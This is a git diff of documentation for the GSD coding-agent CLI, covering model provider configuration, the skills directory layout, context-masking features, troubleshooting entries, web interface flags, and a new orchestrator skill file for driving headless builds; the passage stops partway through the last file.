+ } +} +``` + +The model `id` must match the `--model` flag you passed to `vllm serve`. + +### SGLang + +```json +{ + "providers": { + "sglang": { + "baseUrl": "http://localhost:30000/v1", + "api": "openai-completions", + "apiKey": "sglang", + "compat": { + "supportsDeveloperRole": false, + "supportsReasoningEffort": false + }, + "models": [ + { + "id": "meta-llama/Llama-3.1-8B-Instruct" + } + ] + } + } +} +``` + +--- + +## Custom OpenAI-Compatible Endpoints + +Any server that implements the OpenAI Chat Completions API can work with GSD. This covers proxies (LiteLLM, Portkey, Helicone), self-hosted inference, and new providers. + +**Quickest path — use the onboarding wizard:** + +```bash +gsd config +# Choose "Paste an API key" → "Custom (OpenAI-compatible)" +# Enter: base URL, API key, model ID +``` + +This writes `~/.gsd/agent/models.json` for you automatically. + +**Manual setup:** + +```json +{ + "providers": { + "my-provider": { + "baseUrl": "https://my-endpoint.example.com/v1", + "apiKey": "MY_PROVIDER_API_KEY", + "api": "openai-completions", + "models": [ + { + "id": "model-id-here", + "name": "Friendly Model Name", + "reasoning": false, + "input": ["text"], + "contextWindow": 128000, + "maxTokens": 16384, + "cost": { "input": 0, "output": 0, "cacheRead": 0, "cacheWrite": 0 } + } + ] + } + } +} +``` + +**Adding custom headers (for proxies):** + +```json +{ + "providers": { + "litellm-proxy": { + "baseUrl": "https://litellm.example.com/v1", + "apiKey": "MY_API_KEY", + "api": "openai-completions", + "headers": { + "x-custom-header": "value" + }, + "models": [...] + } + } +} +``` + +**Qwen models with thinking mode:** + +For Qwen-compatible servers, use `thinkingFormat` to enable thinking mode: + +```json +{ + "compat": { + "thinkingFormat": "qwen", + "supportsDeveloperRole": false + } +} +``` + +Use `"qwen-chat-template"` instead if the server requires `chat_template_kwargs.enable_thinking`. + +For the full reference on `compat` fields, `modelOverrides`, value resolution, and advanced configuration, see [Custom Models](./custom-models.md). + +--- + +## Common Pitfalls + +### "Authentication failed" with a valid key + +**Cause:** The key is set in your shell but not visible to GSD. + +**Fix:** Make sure the environment variable is exported in the same terminal where you run `gsd`. Or use `gsd config` to save the key to `~/.gsd/agent/auth.json` so it persists across sessions. + +### OpenRouter models not appearing in `/model` + +**Cause:** No `OPENROUTER_API_KEY` set, so GSD hides OpenRouter models. + +**Fix:** Set the key and restart GSD: + +```bash +export OPENROUTER_API_KEY="sk-or-..." +gsd +``` + +### Ollama returns empty responses + +**Cause:** Ollama server isn't running, or the model isn't pulled. + +**Fix:** + +```bash +# Verify the server is running +curl http://localhost:11434/v1/models + +# Pull the model if missing +ollama pull llama3.1:8b +``` + +### LM Studio model ID mismatch + +**Cause:** The `id` in `models.json` doesn't match what LM Studio exposes via its API. + +**Fix:** Check the LM Studio server tab for the exact model identifier. It often includes the filename or quantization level (e.g., `lmstudio-community/Meta-Llama-3.1-8B-Instruct-GGUF`). + +### `developer` role error with local models + +**Cause:** Most local inference servers don't support the OpenAI `developer` message role. + +**Fix:** Add `compat.supportsDeveloperRole: false` to the provider config. This makes GSD send `system` messages instead: + +```json +{ + "compat": { + "supportsDeveloperRole": false, + "supportsReasoningEffort": false + } +} +``` + +### `stream_options` error with local models + +**Cause:** Some servers don't support `stream_options: { include_usage: true }`. + +**Fix:** Add `compat.supportsUsageInStreaming: false`: + +```json +{ + "compat": { + "supportsUsageInStreaming": false + } +} +``` + +### "apiKey is required" validation error + +**Cause:** `models.json` schema requires `apiKey` when `models` are defined. + +**Fix:** For local servers that don't need auth, set a dummy value: + +```json +"apiKey": "not-needed" +``` + +### Cost shows $0.00 for custom models + +**Expected behavior.** GSD defaults cost to zero for custom models. Override with the `cost` field if you want accurate cost tracking: + +```json +"cost": { "input": 0.15, "output": 0.60, "cacheRead": 0.015, "cacheWrite": 0.19 } +``` + +Values are per million tokens. + +--- + +## Verifying Your Setup + +After configuring a provider: + +1. **Launch GSD:** + ```bash + gsd + ``` + +2. **Check available models:** + ``` + /model + ``` + Your provider's models should appear in the list. + +3. **Switch to the model:** + Select it from the `/model` picker. + +4. **Send a test message:** + Type anything to confirm the model responds. + +If the model doesn't appear, check: +- The environment variable is set in the current shell +- `models.json` is valid JSON (use `cat ~/.gsd/agent/models.json | python3 -m json.tool`) +- The server is running (for local providers) + +For additional help, see [Troubleshooting](./troubleshooting.md) or run `/gsd doctor` inside a session. diff --git a/docs/remote-questions.md b/docs/remote-questions.md index 8e4ce3555..8078a9c56 100644 --- a/docs/remote-questions.md +++ b/docs/remote-questions.md @@ -16,7 +16,7 @@ The setup wizard: 3. Lists servers the bot belongs to (or lets you pick) 4. Lists text channels in the selected server 5. Sends a test message to confirm permissions -6. Saves the configuration to `~/.gsd/preferences.md` +6. Saves the configuration to `~/.gsd/PREFERENCES.md` **Bot requirements:** - A Discord bot application with a token (from [Discord Developer Portal](https://discord.com/developers/applications)) @@ -65,7 +65,7 @@ The setup wizard: ## Configuration -Remote questions are configured in `~/.gsd/preferences.md`: +Remote questions are configured in `~/.gsd/PREFERENCES.md`: ```yaml remote_questions: diff --git a/docs/skills.md b/docs/skills.md index 71f039546..6a9e1d567 100644 --- a/docs/skills.md +++ b/docs/skills.md @@ -2,28 +2,85 @@ Skills are specialized instruction sets that GSD loads when the task matches. They provide domain-specific guidance for the LLM — coding patterns, framework idioms, testing strategies, and tool usage. -## Bundled Skills +Skills follow the open [Agent Skills standard](https://agentskills.io/) and are **not GSD-specific** — they work with Claude Code, OpenAI Codex, Cursor, GitHub Copilot, Windsurf, and 40+ other agents. -GSD ships with these skills, installed to `~/.gsd/agent/skills/`: +## Skill Directories -| Skill | Trigger | Description | -|-------|---------|-------------| -| `frontend-design` | Web UI work — components, pages, dashboards, styling | Production-grade frontend with high design quality | -| `swiftui` | macOS/iOS apps — SwiftUI, Xcode, App Store | Full lifecycle from creation to shipping | -| `debug-like-expert` | Complex debugging — after standard approaches fail | Methodical investigation with evidence gathering | -| `rust-core` | Rust code — ownership, lifetimes, traits, async | Idiomatic, safe, performant Rust patterns | -| `axum-web-framework` | Axum web apps — routing, middleware, extractors | Complete Axum development guide | -| `axum-tests` | Testing Axum apps — integration tests, mock state | Test patterns for Axum applications | -| `tauri` | Tauri v2 desktop apps — setup, plugins, bundling | Cross-platform desktop app development | -| `tauri-ipc-developer` | Tauri IPC — React-Rust type-safe communication | Command scaffolding and serialization | -| `tauri-devtools` | Tauri debugging — CrabNebula DevTools integration | Profiling and monitoring | -| `github-workflows` | GitHub Actions — CI/CD, workflow debugging | Live syntax, run monitoring, failure diagnosis | -| `security-audit` | Security auditing — dependency scanning, OWASP | Comprehensive security assessment | -| `security-review` | Code security review — injection, XSS, auth flaws | Vulnerability-focused code review | -| `security-docker` | Docker security — Dockerfile, runtime hardening | Container security best practices | -| `review` | Code review — staged changes, PRs, security, performance | Diff-aware code review with quality analysis | -| `test` | Test generation and execution — auto-detects frameworks | Generate tests or run existing suites with failure analysis | -| `lint` | Linting and formatting — ESLint, Biome, Prettier | Auto-detect linter, fix issues, report remaining problems | +GSD reads skills from two locations, in priority order: + +| Location | Scope | Description | +|-----------------------------------|---------|----------------------------------------------------------| +| `~/.agents/skills/` | Global | Shared across all projects and all compatible agents | +| `.agents/skills/` (project root) | Project | Project-specific skills, committable to version control | + +Global skills take precedence over project skills when names collide. + +> **Migration from `~/.gsd/agent/skills/`:** On first launch after upgrading, GSD automatically copies skills from the legacy `~/.gsd/agent/skills/` directory to `~/.agents/skills/`. The old directory is preserved for backward compatibility. + +## Installing Skills + +Skills are installed via the [skills.sh CLI](https://skills.sh): + +```bash +# Interactive — choose skills and target agents +npx skills add dpearson2699/swift-ios-skills + +# Install specific skills non-interactively +npx skills add dpearson2699/swift-ios-skills --skill swift-concurrency --skill swiftui-patterns -y + +# Install all skills from a repo +npx skills add dpearson2699/swift-ios-skills --all + +# Check for updates +npx skills check + +# Update installed skills +npx skills update +``` + +### Onboarding Catalog + +During `gsd init`, GSD detects the project's tech stack and recommends relevant skill packs. For brownfield projects, detection is automatic; for greenfield projects, the user picks a tech stack. + +The curated catalog is maintained in `src/resources/extensions/gsd/skill-catalog.ts`. Each entry maps a tech stack to a skills.sh repo and specific skill names. + +#### Available Skill Packs + +**Swift (any Swift project — `Package.swift` or `.xcodeproj` detected):** +- **SwiftUI** — layout, navigation, animations, gestures, Liquid Glass +- **Swift Core** — Swift language, concurrency, Codable, Charts, Testing, SwiftData + +**iOS (only when `.xcodeproj` targets `iphoneos` via SDKROOT):** +- **iOS App Frameworks** — App Intents, Widgets, StoreKit, MapKit, Live Activities +- **iOS Data Frameworks** — CloudKit, HealthKit, MusicKit, WeatherKit, Contacts +- **iOS AI & ML** — Core ML, Vision, on-device AI, speech recognition +- **iOS Engineering** — networking, security, accessibility, localization, Instruments +- **iOS Hardware** — Bluetooth, CoreMotion, NFC, PencilKit, RealityKit +- **iOS Platform** — CallKit, EnergyKit, HomeKit, SharePlay, PermissionKit + +**Web:** +- **React & Web Frontend** — React best practices, web design, composition patterns +- **React Native** — cross-platform mobile patterns +- **Frontend Design & UX** — frontend design, accessibility + +**Languages:** +- **Rust** — Rust patterns and best practices +- **Python** — Python patterns and best practices +- **Go** — Go patterns and best practices + +**General:** +- **Document Handling** — PDF, DOCX, XLSX, PPTX creation and manipulation + +### Maintaining the Catalog + +The skill catalog lives in [`src/resources/extensions/gsd/skill-catalog.ts`](../src/resources/extensions/gsd/skill-catalog.ts). To add or update a pack: + +1. Add a `SkillPack` entry to the `SKILL_CATALOG` array with `repo`, `skills`, and matching criteria +2. For language-detection matching, use `matchLanguages` (values from `detection.ts` `LANGUAGE_MAP`) +3. For Xcode platform matching, use `matchXcodePlatforms` (e.g., `["iphoneos"]` — parsed from `SDKROOT` in `project.pbxproj`) +4. For file-presence matching, use `matchFiles` (checked against `PROJECT_FILES` in `detection.ts`) +5. If the pack should appear in greenfield choices, add it to `GREENFIELD_STACKS` +6. Packs sharing the same `repo` are batched into a single `npx skills add` invocation ## Skill Discovery @@ -59,18 +116,18 @@ skill_rules: ### Resolution Order Skills can be referenced by: -1. **Bare name** — e.g., `frontend-design` → scans `~/.gsd/agent/skills/` and project skills -2. **Absolute path** — e.g., `/Users/you/.gsd/agent/skills/my-skill/SKILL.md` +1. **Bare name** — e.g., `frontend-design` → scans `~/.agents/skills/` and project `.agents/skills/` +2. **Absolute path** — e.g., `/Users/you/.agents/skills/my-skill/SKILL.md` 3. **Directory path** — e.g., `~/custom-skills/my-skill` → looks for `SKILL.md` inside -User skills (`~/.gsd/agent/skills/`) take precedence over project skills. +Global skills (`~/.agents/skills/`) take precedence over project skills (`.agents/skills/`). ## Custom Skills Create your own skills by adding a directory with a `SKILL.md` file: ``` -~/.gsd/agent/skills/my-skill/ +~/.agents/skills/my-skill/ SKILL.md — instructions for the LLM references/ — optional reference files ``` @@ -82,10 +139,12 @@ The `SKILL.md` file contains instructions the LLM follows when the skill is acti Place skills in your project for project-specific guidance: ``` -.gsd/agent/skills/my-project-skill/ +.agents/skills/my-project-skill/ SKILL.md ``` +Project-local skills can be committed to version control so team members share the same skill set. + ## Skill Lifecycle Management GSD tracks skill performance across auto-mode sessions and surfaces health data to help you maintain skill quality. diff --git a/docs/token-optimization.md b/docs/token-optimization.md index a622869d1..4a3a423af 100644 --- a/docs/token-optimization.md +++ b/docs/token-optimization.md @@ -257,20 +257,64 @@ models: ## How the Pieces Fit Together ``` -preferences.md +PREFERENCES.md └─ token_profile: balanced ├─ resolveProfileDefaults() → model defaults + phase skip defaults ├─ resolveInlineLevel() → standard │ └─ prompt builders gate context inclusion by level - └─ classifyUnitComplexity() → routes to execution/execution_simple model - ├─ task plan analysis (steps, files, signals) - ├─ unit type defaults - ├─ budget pressure adjustment - └─ adaptive learning from routing-history.json + ├─ classifyUnitComplexity() → routes to execution/execution_simple model + │ ├─ task plan analysis (steps, files, signals) + │ ├─ unit type defaults + │ ├─ budget pressure adjustment + │ ├─ adaptive learning from routing-history.json + │ └─ capability scoring (when capability_routing: true) + │ └─ 7-dimension model profiles × task requirement vectors + └─ context_management + ├─ observation masking (before_provider_request hook) + ├─ tool result truncation (tool_result_max_chars) + └─ phase handoff anchors (injected into prompt builders) ``` The profile is resolved once and flows through the entire dispatch pipeline. Explicit preferences override profile defaults at every layer. +## Observation Masking + +*Introduced in v2.59.0* + +During auto-mode sessions, tool results accumulate in the conversation history and consume context window space. Observation masking replaces tool result content older than N user turns with a lightweight placeholder before each LLM call. This reduces token usage with zero LLM overhead — no summarization calls, no latency. + +Masking is enabled by default during auto-mode. Configure via preferences: + +```yaml +context_management: + observation_masking: true # default: true (set false to disable) + observation_mask_turns: 8 # keep results from last 8 user turns (range: 1-50) + tool_result_max_chars: 800 # truncate individual tool results beyond this length +``` + +### How It Works + +1. Before each provider request, the `before_provider_request` hook inspects the messages array +2. Tool results (`toolResult`, `bashExecution`) older than the configured turn threshold are replaced with `[result masked — within summarized history]` +3. Recent tool results (within the keep window) are preserved in full +4. All assistant and user messages are always preserved — only tool result content is masked + +This pairs with the existing compaction system: masking reduces context pressure between compactions, and compaction handles the full context reset when the window fills. + +### Tool Result Truncation + +Individual tool results that exceed `tool_result_max_chars` (default: 800) are truncated with a `…[truncated]` marker. This prevents a single large tool output from dominating the context window. + +## Phase Handoff Anchors + +*Introduced in v2.59.0* + +When auto-mode transitions between phases (research → planning → execution), structured JSON anchors are written to `.gsd/milestones//anchors/.json`. Downstream prompt builders inject these anchors so the next phase inherits intent, decisions, blockers, and next steps without re-inferring from artifact files. + +This reduces context drift — the 65% of enterprise agent failures caused by agents losing track of prior decisions across phase boundaries. + +Anchors are written automatically after successful completion of `research-milestone`, `research-slice`, `plan-milestone`, and `plan-slice` units. No configuration needed. + ## Prompt Compression *Introduced in v2.29.0* diff --git a/docs/troubleshooting.md b/docs/troubleshooting.md index 977a7881a..875bba7fc 100644 --- a/docs/troubleshooting.md +++ b/docs/troubleshooting.md @@ -97,6 +97,8 @@ models: **Headless mode:** `gsd headless auto` auto-restarts the entire process on crash (default 3 attempts with exponential backoff). Combined with provider error auto-resume, this enables true overnight unattended execution. +For common provider setup issues (role errors, streaming errors, model ID mismatches), see the [Provider Setup Guide — Common Pitfalls](./providers.md#common-pitfalls). + ### Budget ceiling reached **Symptoms:** Auto mode pauses with "Budget ceiling reached." @@ -151,6 +153,38 @@ rm -rf "$(dirname .gsd)/.gsd.lock" - If the error persists, close tools that may be holding the file open and then retry. - If repeated failures continue, run `/gsd doctor` to confirm the repo state is still healthy and report the exact path + error code. +### Node v24 web boot failure + +**Symptoms:** `gsd --web` fails with `ERR_UNSUPPORTED_NODE_MODULES_TYPE_STRIPPING` on Node v24. + +**Cause:** Node v24 changed type-stripping behavior for `node_modules`, breaking the Next.js web build. + +**Fix:** Fixed in v2.42.0+ (#1864). Upgrade to the latest version. + +### Orphan web server process + +**Symptoms:** `gsd --web` fails because port 3000 is already in use, even though no GSD session is running. + +**Cause:** A previous web server process was not cleaned up on exit. + +**Fix:** Fixed in v2.42.0+. GSD now cleans up stale web server processes automatically. If you're on an older version, kill the orphan process manually: `lsof -ti:3000 | xargs kill`. + +### Non-JS project blocked by worktree health check + +**Symptoms:** Worktree health check fails or blocks auto-mode in projects that don't use Node.js (e.g., Rust, Go, Python). + +**Cause:** The worktree health check only recognized JavaScript ecosystems prior to v2.42.0. + +**Fix:** Fixed in v2.42.0+ (#1860). The health check now supports 17+ ecosystems. Upgrade to the latest version. + +### German/non-English locale git errors + +**Symptoms:** Git commands fail or produce unexpected results when the system locale is non-English (e.g., German). + +**Cause:** GSD parsed git output assuming English locale strings. + +**Fix:** Fixed in v2.42.0+. All git commands now force `LC_ALL=C` to ensure consistent English output regardless of system locale. + ## MCP Client Issues ### `mcp_servers` shows no configured servers @@ -278,6 +312,16 @@ Doctor rebuilds `STATE.md` from plan and roadmap files on disk and fixes detecte - **Forensics:** `/gsd forensics` for structured post-mortem analysis of auto-mode failures - **Session logs:** `.gsd/activity/` contains JSONL session dumps for crash forensics +## iTerm2-Specific Issues + +### Ctrl+Alt shortcuts trigger the wrong action (e.g., Ctrl+Alt+G opens external editor instead of GSD dashboard) + +**Symptoms:** Pressing Ctrl+Alt+G opens the external editor prompt (Ctrl+G) instead of the GSD dashboard. Other Ctrl+Alt shortcuts behave as their Ctrl-only counterparts. + +**Cause:** iTerm2's default Left Option Key setting is "Normal", which swallows the Alt modifier for Ctrl+Alt key combinations. The terminal receives only the Ctrl key, so Ctrl+Alt+G arrives as Ctrl+G. + +**Fix:** In iTerm2, go to **Profiles → Keys → General** and set **Left Option Key** to **Esc+**. This makes Alt/Option send an escape prefix that terminal applications can detect, enabling Ctrl+Alt shortcuts to work correctly. + ## Windows-Specific Issues ### LSP returns ENOENT on Windows (MSYS2/Git Bash) @@ -339,3 +383,33 @@ This shows which servers are active and, if none are found, diagnoses why — in | Go | `go install golang.org/x/tools/gopls@latest` | After installing, run `lsp reload` to restart detection without restarting GSD. + +## Notifications + +### Notifications not appearing on macOS + +**Symptoms:** `notifications.enabled: true` in preferences, but no desktop notifications appear during auto-mode (no milestone complete alerts, no budget warnings, no error notifications). No error messages logged. + +**Cause:** GSD uses `osascript display notification` as a fallback on macOS. This command is attributed to your terminal app (Ghostty, iTerm2, Alacritty, Kitty, Warp, etc.). If that app doesn't have notification permissions in System Settings → Notifications, macOS silently drops the notification — `osascript` exits 0 with no error. + +Most terminal apps don't appear in the Notifications settings panel until they've successfully delivered at least one notification, creating a chicken-and-egg problem. + +**Fix (recommended):** Install `terminal-notifier`, which registers as its own Notification Center app: + +```bash +brew install terminal-notifier +``` + +GSD automatically prefers `terminal-notifier` when available. On first use, macOS will prompt you to allow notifications — this is the expected behavior. + +**Fix (alternative):** Go to **System Settings → Notifications** and enable notifications for your terminal app. If your terminal doesn't appear in the list, try sending a test notification from Terminal.app first to register "Script Editor": + +```bash +osascript -e 'display notification "test" with title "GSD"' +``` + +**Verify:** After applying either fix, test with: + +```bash +terminal-notifier -title "GSD" -message "working!" -sound Glass +``` diff --git a/docs/web-interface.md b/docs/web-interface.md index ab2ee0ad1..2b55bfccf 100644 --- a/docs/web-interface.md +++ b/docs/web-interface.md @@ -7,16 +7,29 @@ GSD includes a browser-based web interface for project management, real-time pro ## Quick Start ```bash -pi --web +gsd --web ``` This starts a local web server and opens the GSD dashboard in your default browser. +### CLI Flags (v2.42.0) + +```bash +gsd --web --host 0.0.0.0 --port 8080 --allowed-origins "https://example.com" +``` + +| Flag | Default | Description | +|------|---------|-------------| +| `--host` | `localhost` | Bind address for the web server | +| `--port` | `3000` | Port for the web server | +| `--allowed-origins` | (none) | Comma-separated list of allowed CORS origins | + ## Features - **Project management** — view milestones, slices, and tasks in a visual dashboard - **Real-time progress** — server-sent events push status updates as auto-mode executes - **Multi-project support** — manage multiple projects from a single browser tab via `?project=` URL parameter +- **Change project root** — switch project directories from the web UI without restarting the server (v2.44) - **Onboarding flow** — API key setup and provider configuration through the browser - **Model selection** — switch models and providers from the web UI @@ -31,7 +44,7 @@ Key components: ## Configuration -The web server binds to `localhost` by default. No additional configuration is required. +The web server binds to `localhost:3000` by default. Use `--host`, `--port`, and `--allowed-origins` to override (see CLI Flags above). ### Environment Variables @@ -39,6 +52,14 @@ The web server binds to `localhost` by default. No additional configuration is r |----------|-------------| | `GSD_WEB_PROJECT_CWD` | Default project path when `?project=` is not specified | +## Node v24 Compatibility + +Node v24 introduced breaking changes to type stripping that caused `ERR_UNSUPPORTED_NODE_MODULES_TYPE_STRIPPING` on web boot. This is fixed in v2.42.0+ (#1864). If you encounter this error, upgrade GSD. + +## Auth Token Persistence + +As of v2.42.0, the web UI persists the auth token in `sessionStorage` so it survives page refreshes (#1877). Previously, refreshing the page required re-authentication. + ## Platform Notes - **Windows**: The web build is skipped on Windows due to Next.js webpack EPERM issues with system directories. The CLI remains fully functional. diff --git a/docs/what-is-pi/09-the-customization-stack.md b/docs/what-is-pi/09-the-customization-stack.md index 10a3fb42d..10d032b39 100644 --- a/docs/what-is-pi/09-the-customization-stack.md +++ b/docs/what-is-pi/09-the-customization-stack.md @@ -48,8 +48,8 @@ On-demand capability packages following the [Agent Skills standard](https://agen ``` **Placement:** -- `~/.gsd/agent/skills/` or `~/.agents/skills/` (global) -- `.gsd/skills/` or `.agents/skills/` (project, searched up to git root) +- `~/.agents/skills/` (global — shared across all agents) +- `.agents/skills/` (project, searched up to git root) **Skill structure:** ``` diff --git a/docs/what-is-pi/15-pi-packages-the-ecosystem.md b/docs/what-is-pi/15-pi-packages-the-ecosystem.md index 4e19de60a..7116cca99 100644 --- a/docs/what-is-pi/15-pi-packages-the-ecosystem.md +++ b/docs/what-is-pi/15-pi-packages-the-ecosystem.md @@ -38,6 +38,6 @@ Or just use conventional directory names (`extensions/`, `skills/`, `prompts/`, - [Package gallery](https://shittycodingagent.ai/packages) - [npm search](https://www.npmjs.com/search?q=keywords%3Api-package) -- [Discord community](https://discord.com/invite/3cU7Bz4UPx) +- [Discord community](https://discord.com/invite/nKXTsAcmbT) --- diff --git a/docs/what-is-pi/18-quick-reference-commands-shortcuts.md b/docs/what-is-pi/18-quick-reference-commands-shortcuts.md index fa6b09ad0..8b195117a 100644 --- a/docs/what-is-pi/18-quick-reference-commands-shortcuts.md +++ b/docs/what-is-pi/18-quick-reference-commands-shortcuts.md @@ -40,6 +40,8 @@ | Alt+Enter (during streaming) | Queue follow-up message | | Alt+Up | Retrieve queued messages | +> **iTerm2 users:** Ctrl+Alt shortcuts (e.g., Ctrl+Alt+G for the GSD dashboard) require Left Option Key set to "Esc+" in Profiles → Keys → General. The default "Normal" setting swallows the Alt modifier. + ### CLI ```bash diff --git a/docs/working-in-teams.md b/docs/working-in-teams.md index 71956d5ff..fd5476813 100644 --- a/docs/working-in-teams.md +++ b/docs/working-in-teams.md @@ -9,7 +9,7 @@ GSD supports multi-user workflows where several developers work on the same repo The simplest way to configure GSD for team use is to set `mode: team` in your project preferences. This enables unique milestone IDs, push branches, and pre-merge checks in one setting: ```yaml -# .gsd/preferences.md (project-level, committed to git) +# .gsd/PREFERENCES.md (project-level, committed to git) --- version: 1 mode: team @@ -38,7 +38,7 @@ Share planning artifacts (milestones, roadmaps, decisions) while keeping runtime ``` **What gets shared** (committed to git): -- `.gsd/preferences.md` — project preferences +- `.gsd/PREFERENCES.md` — project preferences - `.gsd/PROJECT.md` — living project description - `.gsd/REQUIREMENTS.md` — requirement contract - `.gsd/DECISIONS.md` — architectural decisions @@ -50,7 +50,7 @@ Share planning artifacts (milestones, roadmaps, decisions) while keeping runtime ### 3. Commit the Preferences ```bash -git add .gsd/preferences.md +git add .gsd/PREFERENCES.md git commit -m "chore: enable GSD team workflow" ``` @@ -71,7 +71,7 @@ If you have an existing project with `.gsd/` blanket-ignored: 1. Ensure no milestones are in progress (clean state) 2. Update `.gitignore` to use the selective pattern above -3. Add `unique_milestone_ids: true` to `.gsd/preferences.md` +3. Add `unique_milestone_ids: true` to `.gsd/PREFERENCES.md` 4. Optionally rename existing milestones to use unique IDs: ``` I have turned on unique milestone ids, please update all old milestone diff --git a/gsd-orchestrator/SKILL.md b/gsd-orchestrator/SKILL.md new file mode 100644 index 000000000..ad423afdf --- /dev/null +++ b/gsd-orchestrator/SKILL.md @@ -0,0 +1,215 @@ +--- +name: gsd-orchestrator +description: > + Build software products autonomously via GSD headless mode. Handles the full + lifecycle: write a spec, launch a build, poll for completion, handle blockers, + track costs, and verify the result. Use when asked to "build something", + "create a project", "run gsd", "check build status", or any task that + requires autonomous software development via subprocess. +metadata: + openclaw: + requires: + bins: [gsd] + install: + kind: node + package: gsd-pi + bins: [gsd] +--- + + +You are an autonomous agent that builds software by orchestrating GSD as a subprocess. +GSD is a headless CLI that plans, codes, tests, and ships software from a spec. +You control it via shell commands, exit codes, and JSON output — no SDK, no RPC. + + + +GSD headless is a subprocess you launch and monitor. Think of it like a junior developer +you hand a spec to: + +1. You write the spec (what to build) +2. You launch the build (`gsd headless ... new-milestone --context spec.md --auto`) +3. You wait for it to finish (exit code tells you the outcome) +4. You check the result (query state, inspect files, verify deliverables) +5. If blocked, you intervene (steer, supply answers, or escalate) + +The subprocess handles all planning, coding, testing, and git commits internally. +You never write application code yourself — GSD does that. + + + +- **Flags before command.** `gsd headless [--flags] [command] [args]`. Flags after the command are ignored. +- **Redirect stderr.** JSON output goes to stdout. Progress goes to stderr. Always `2>/dev/null` when parsing JSON. +- **Check exit codes.** 0=success, 1=error, 10=blocked (needs you), 11=cancelled. +- **Use `query` to poll.** Instant (~50ms), no LLM cost. Use it between steps, not `auto` for status. +- **Budget awareness.** Track `cost.total` from query results. Set limits before launching long runs. +- **One project directory per build.** Each GSD project needs its own directory with a `.gsd/` folder. + + + +Route based on what you need to do: + +**Build something from scratch:** +Read `workflows/build-from-spec.md` — write spec, init directory, launch, monitor, verify. + +**Check on a running or completed build:** +Read `workflows/monitor-and-poll.md` — query state, interpret phases, handle blockers. + +**Execute with fine-grained control:** +Read `workflows/step-by-step.md` — run one unit at a time with decision points. + +**Understand the JSON output:** +Read `references/json-result.md` — field reference for HeadlessJsonResult. + +**Pre-supply answers or secrets:** +Read `references/answer-injection.md` — answer file schema and injection mechanism. + +**Look up a specific command:** +Read `references/commands.md` — full command reference with flags and examples. + + + + +**Launch a full build (spec to working code):** +```bash +mkdir -p /tmp/my-project && cd /tmp/my-project && git init +cat > spec.md << 'EOF' +# Your Product Spec Here +Build a ... +EOF +gsd headless --output-format json --context spec.md new-milestone --auto 2>/dev/null +``` + +**Check project state (instant, free):** +```bash +cd /path/to/project +gsd headless query | jq '{phase: .state.phase, progress: .state.progress, cost: .cost.total}' +``` + +**Resume work on an existing project:** +```bash +cd /path/to/project +gsd headless --output-format json auto 2>/dev/null +``` + +**Run one step at a time:** +```bash +RESULT=$(gsd headless --output-format json next 2>/dev/null) +echo "$RESULT" | jq '{status: .status, phase: .phase, cost: .cost.total}' +``` + + + + +| Code | Meaning | Your action | +|------|---------|-------------| +| `0` | Success | Check deliverables, verify output, report completion | +| `1` | Error or timeout | Inspect stderr, check `.gsd/STATE.md`, retry or escalate | +| `10` | Blocked | Query state for blocker details, steer around it or escalate to human | +| `11` | Cancelled | Process was interrupted — resume with `--resume ` or restart | + + + +GSD creates and manages all state in `.gsd/`: +``` +.gsd/ + PROJECT.md # What this project is + REQUIREMENTS.md # Capability contract + DECISIONS.md # Architectural decisions (append-only) + KNOWLEDGE.md # Persistent project knowledge (patterns, rules, lessons) + STATE.md # Current phase and next action + milestones/ + M001-xxxxx/ + M001-xxxxx-CONTEXT.md # Scope, constraints, assumptions + M001-xxxxx-ROADMAP.md # Slices with checkboxes + M001-xxxxx-SUMMARY.md # Completion summary + slices/S01/ + S01-PLAN.md # Tasks + S01-SUMMARY.md # Slice summary + tasks/ + T01-PLAN.md # Individual task spec + T01-SUMMARY.md # Task completion summary +``` + +State is derived from files on disk — checkboxes in ROADMAP.md and PLAN.md are the source of truth for completion. You never need to edit these files. GSD manages them. But you can read them to understand progress. + + + +| Flag | Description | +|------|-------------| +| `--output-format ` | `text` (default), `json` (structured result at exit), `stream-json` (JSONL events) | +| `--json` | Alias for `--output-format stream-json` — JSONL event stream to stdout | +| `--bare` | Skip CLAUDE.md, AGENTS.md, user settings, user skills. Use for CI/ecosystem runs. | +| `--resume ` | Resume a prior headless session by its session ID | +| `--timeout N` | Overall timeout in ms (default: 300000, use 0 to disable) | +| `--model ID` | Override LLM model | +| `--supervised` | Forward interactive UI requests to orchestrator via stdout/stdin | +| `--response-timeout N` | Timeout (ms) for orchestrator response in supervised mode (default: 30000) | +| `--answers ` | Pre-supply answers and secrets from JSON file | +| `--events ` | Filter JSONL to specific event types (comma-separated, implies `--json`) | +| `--verbose` | Show tool calls in progress output | +| `--context ` | Spec file path for `new-milestone` (use `-` for stdin) | +| `--context-text ` | Inline spec text for `new-milestone` | +| `--auto` | Chain into auto-mode after `new-milestone` | + + + +Pre-supply answers and secrets for fully autonomous runs: + +```bash +gsd headless --answers answers.json --output-format json auto 2>/dev/null +``` + +```json +{ + "questions": { "question_id": "selected_option" }, + "secrets": { "API_KEY": "sk-..." }, + "defaults": { "strategy": "first_option" } +} +``` + +- **questions** — question ID to answer (string for single-select, string[] for multi-select) +- **secrets** — env var to value, injected into child process environment +- **defaults.strategy** — `"first_option"` (default) or `"cancel"` for unmatched questions + +See `references/answer-injection.md` for the full mechanism. + + + +For real-time monitoring, use JSONL event streaming: + +```bash +gsd headless --json auto 2>/dev/null | while read -r line; do + TYPE=$(echo "$line" | jq -r '.type') + case "$TYPE" in + tool_execution_start) echo "Tool: $(echo "$line" | jq -r '.toolName')" ;; + extension_ui_request) echo "GSD: $(echo "$line" | jq -r '.message // .title // empty')" ;; + agent_end) echo "Session ended" ;; + esac +done +``` + +Filter to specific events: `--events agent_end,execution_complete,extension_ui_request` + +Available types: `agent_start`, `agent_end`, `tool_execution_start`, `tool_execution_end`, +`tool_execution_update`, `extension_ui_request`, `message_start`, `message_end`, +`message_update`, `turn_start`, `turn_end`, `cost_update`, `execution_complete`. + + + +| Command | Purpose | +|---------|---------| +| `auto` | Run all queued units until milestone complete or blocked (default) | +| `next` | Run exactly one unit, then exit | +| `query` | Instant JSON snapshot — state, next dispatch, costs (no LLM, ~50ms) | +| `new-milestone` | Create milestone from spec file | +| `dispatch ` | Force specific phase (research, plan, execute, complete, reassess, uat, replan) | +| `stop` / `pause` | Control auto-mode | +| `steer ` | Hard-steer plan mid-execution | +| `skip` / `undo` | Unit control | +| `queue` | Queue/reorder milestones | +| `history` | View execution history | +| `doctor` | Health check + auto-fix | +| `knowledge ` | Add persistent project knowledge | + +See `references/commands.md` for the complete reference. + diff --git a/gsd-orchestrator/references/answer-injection.md b/gsd-orchestrator/references/answer-injection.md new file mode 100644 index 000000000..369a3828b --- /dev/null +++ 